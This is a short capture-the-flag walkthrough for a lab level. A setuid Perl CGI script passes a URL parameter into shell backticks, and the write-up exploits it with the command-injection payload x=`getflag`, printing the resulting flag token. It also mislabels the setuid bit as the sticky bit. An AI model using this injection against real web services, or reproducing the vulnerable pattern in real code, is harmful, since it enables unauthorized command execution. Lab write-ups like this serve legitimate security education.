# Level 04 instructions:

## Check home directory:
```
$ ls -l
total 4
-rwsr-sr-x 1 flag04 level04 152 Mar  5  2016 level04.pl
```

Since the sticky bit is set, the program will run as flag04 meaning we could run arbitrary commands as flag if we figure out how to exploit it.

## See contents of level04.pl:
```
$ cat level04.pl
#!/usr/bin/perl
# localhost:4747
use CGI qw{param};
print "Content-type: text/html\n\n";
sub x {
  $y = $_[0];
  print `echo $y 2>&1`;
}
x(param("x"));
```

## Run level04.pl from the web browser on the host machine:
In a web browser navigate to <ip-address>:4747?x=`getflag`
```
Check flag.Here is your token : ne2searoevaevoem4ov4ar8ap
``` 
